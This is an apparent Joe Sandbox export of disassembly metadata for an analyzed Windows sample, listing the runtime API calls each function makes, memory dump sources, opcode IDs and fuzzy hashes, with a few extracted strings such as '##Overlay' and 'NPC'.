                                                                                                                                                                                                      • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C7918
                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C7937
                                                                                                                                                                                                      • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C799B
                                                                                                                                                                                                      • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C79A4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@memset$??1?$basic_ios@??1?$basic_istream@Concurrency::cancel_current_task
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 915423947-0
                                                                                                                                                                                                      • Opcode ID: d0938123501016634833643535347a7608c7b85d311b845c6036055ad67c7832
                                                                                                                                                                                                      • Instruction ID: 79f0a2e552e5f49df38f5b6ad68168c6456d4f6dbb71f0c35d8336186846ffc4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0938123501016634833643535347a7608c7b85d311b845c6036055ad67c7832
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0141C122A04B86C5FB149B65E4523A92760FF48FA4F244639DB6D477EADF3CE489C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF68B4C7D3A
                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C7D57
                                                                                                                                                                                                      • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4C7D80
                                                                                                                                                                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF68B4C7DCB
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C90B0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C90DD
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C90B0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C90F7
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C90B0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C9129
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C90B0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C9154
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C90B0: std::_Facet_Register.LIBCPMT ref: 00007FF68B4C916D
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C90B0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF68B4C7DDA), ref: 00007FF68B4C918C
                                                                                                                                                                                                      • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF68B4C7DE0
                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C7DF7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3911317180-0
                                                                                                                                                                                                      • Opcode ID: 6ee5363cf3669aec1283ec236c4f6ca107bc99fb734426359ee1ed55743ad2d4
                                                                                                                                                                                                      • Instruction ID: b909b58b421fe37c1e52a50037e60aa7d2457dbe8e36be1245f35fbcf1ac0fb4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ee5363cf3669aec1283ec236c4f6ca107bc99fb734426359ee1ed55743ad2d4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D31273261AB41C6EB508F25A86536977A4FF4CF88F141139DA8E87B68DF3CD449C740
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __std_fs_code_page.MSVCPRT ref: 00007FF68B4B70AF
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4CB9C0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF68B4B70B4), ref: 00007FF68B4CB9C4
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4CB9C0: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF68B4B70B4), ref: 00007FF68B4CB9D3
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B722D
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C9590: memcpy.VCRUNTIME140(?,00000000,00000004,?,00007FF68B4B71FA), ref: 00007FF68B4C9672
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B727B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememcpy
                                                                                                                                                                                                      • String ID: ", "$: "
                                                                                                                                                                                                      • API String ID: 2077005984-747220369
                                                                                                                                                                                                      • Opcode ID: cf65115a1431c84b442289c742c473fe48d1f689dcccd6f9c6b6db73ded2e6e3
                                                                                                                                                                                                      • Instruction ID: f671a7abf755920d74889fcdb481890e50637411519a6ece2085857be4d43394
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf65115a1431c84b442289c742c473fe48d1f689dcccd6f9c6b6db73ded2e6e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6617962B04B409AEB04DFA5D1523AC2362FB48B88F108539EF5D97BA9DF38D555C380
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                      • Opcode ID: 36118ffba3ed1544818bac441154d4563467c57fa6e8cefbf7dc2a3f9863e97f
                                                                                                                                                                                                      • Instruction ID: 9b31c4fb6446532e7a69b86d496092c28a24f9f7db16723aecce175c0852be5d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36118ffba3ed1544818bac441154d4563467c57fa6e8cefbf7dc2a3f9863e97f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1241F531A4AB42C6EA598F55E59123837A0FF48F40B494439CE1D8337AEF3DE955C740
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BA31
                                                                                                                                                                                                        • Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BA5A
                                                                                                                                                                                                        • Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BA83
                                                                                                                                                                                                        • Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BAB8
                                                                                                                                                                                                        • Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BAE1
                                                                                                                                                                                                        • Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF68B4812AE), ref: 00007FF68B49BB10
                                                                                                                                                                                                        • Part of subcall function 00007FF68B49BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49BB94
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4812CD
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4812F2
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B481314
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B481336
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B481358
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B48137A
                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B48139C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                      • Opcode ID: c08c9ad099b94047ebeba4421537832623ccdabfcd516ae9a7ad386d1ad22c2f
                                                                                                                                                                                                      • Instruction ID: 803fe54c70e11ceb1cdef4c0845ab83edfb078b8cea8ffcaf4c15b739e16e533
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c08c9ad099b94047ebeba4421537832623ccdabfcd516ae9a7ad386d1ad22c2f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63312920A5A682C5FE658F51D49167923A0FF4DF00F0C543EC90ED76BAEF2CA944C394
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memset$free$malloc
                                                                                                                                                                                                      • String ID: ##Overlay
                                                                                                                                                                                                      • API String ID: 1393892039-3248624929
                                                                                                                                                                                                      • Opcode ID: e60084c3b1010948b4154768d3bb7ebc0b90b260b635dcb7335227345dd38c4b
                                                                                                                                                                                                      • Instruction ID: 8eff9a705c9c91740627238e9fc30b65669d5b0fd418da5824477767564e27aa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e60084c3b1010948b4154768d3bb7ebc0b90b260b635dcb7335227345dd38c4b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B22E132505BC189D310DF29E8441D877A8FB45F68FAC433AEAA40B398DF74A1A1C768
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                      • Opcode ID: 6bcadec244314d441987c25ba5b3647a26f387ba020272134a96f1e2547d8c90
                                                                                                                                                                                                      • Instruction ID: fbe5afda1bd944e3e4d7e267a420335d4eb1942360e277f307f3a0af8f5ae3e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bcadec244314d441987c25ba5b3647a26f387ba020272134a96f1e2547d8c90
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5631F521A4A681C6EA958F61D55527833A0FF8AF40F49543AC90ED73B9EF3CE944C710
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C753B
                                                                                                                                                                                                      • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF68B4C755A
                                                                                                                                                                                                      • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C758C
                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C75A7
                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF68B4C75F3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1830095303-0
                                                                                                                                                                                                      • Opcode ID: e54aefa859e89064fcb29190908f3b436e7fcc425140c088158f95217a78a637
                                                                                                                                                                                                      • Instruction ID: 93ca30161c6811a4529bc88bf340020bf83493f327497b99abcd7ab55549bc28
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e54aefa859e89064fcb29190908f3b436e7fcc425140c088158f95217a78a637
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6314732605B81C5EB108F29E6A572D7BA0FB49F89F048139DA5D83728CF3DD56AC740
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C67C3
                                                                                                                                                                                                      • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF68B4C67E2
                                                                                                                                                                                                      • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C6814
                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C682F
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7D00: ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF68B4C7D3A
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7D00: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C7D57
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7D00: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4C7D80
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7D00: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF68B4C7DCB
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7D00: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF68B4C7DE0
                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF68B4C687B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2682282330-0
                                                                                                                                                                                                      • Opcode ID: ce3dd0867776183b89d192c1dc58066f1ba364c6306f65d87bf7f2383671e37d
                                                                                                                                                                                                      • Instruction ID: a6306d919cc8b3332440c7c501262d3381a1417bddeda35e106ea7ca44764919
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce3dd0867776183b89d192c1dc58066f1ba364c6306f65d87bf7f2383671e37d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F21E636649B41C6EB108F25F86572A77A4FB49F88F048139DA8D83B68DF3DE149C741
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ControlDevice$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID: NPC
                                                                                                                                                                                                      • API String ID: 2054765191-3492492454
                                                                                                                                                                                                      • Opcode ID: 4f3d81cd193f8d4480fc7a634ee03ff8aec5643986a2c8ea27ff1b570589ecce
                                                                                                                                                                                                      • Instruction ID: 3c347157c892e283f38bc8d35b60816cfea56ee74e2550f33dbdfd3fb9280118
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f3d81cd193f8d4480fc7a634ee03ff8aec5643986a2c8ea27ff1b570589ecce
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B861BC72B05781DAEB10CF69E4513AD33A1FB48B98F408A39EA6D47BA9CF38D115C740
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
